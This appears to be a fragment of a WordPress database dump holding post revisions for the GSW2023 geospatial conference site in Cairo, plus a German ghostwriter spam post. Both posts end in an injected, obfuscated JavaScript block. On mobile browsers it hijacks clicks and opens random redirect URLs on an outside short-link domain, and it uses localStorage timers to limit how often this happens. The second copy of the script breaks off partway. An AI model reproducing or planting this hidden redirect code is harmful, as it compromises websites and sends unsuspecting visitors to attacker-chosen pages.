(hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-29 12:45:34','2023-04-29 12:45:34','',3066,'https://gsw2023.com/?p=4136',0,'revision','',0),
(4295,1,'2023-05-06 15:40:16','2023-05-06 15:40:16','<p>Die Einstellung eines Ghostwriters zum Schreiben Ihres Buches ist eine Investition, die Sie sorgfältig berücksichtigen müssen. Ein Ghostwriter sollte genug bezahlt werden, um seine Lebenshaltungskosten <a href=\"https://premiumghostwriter.de/preise/\">ghostwriter kosten</a> und einen angemessenen Anteil an Lizenzgebühren zu decken.</p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 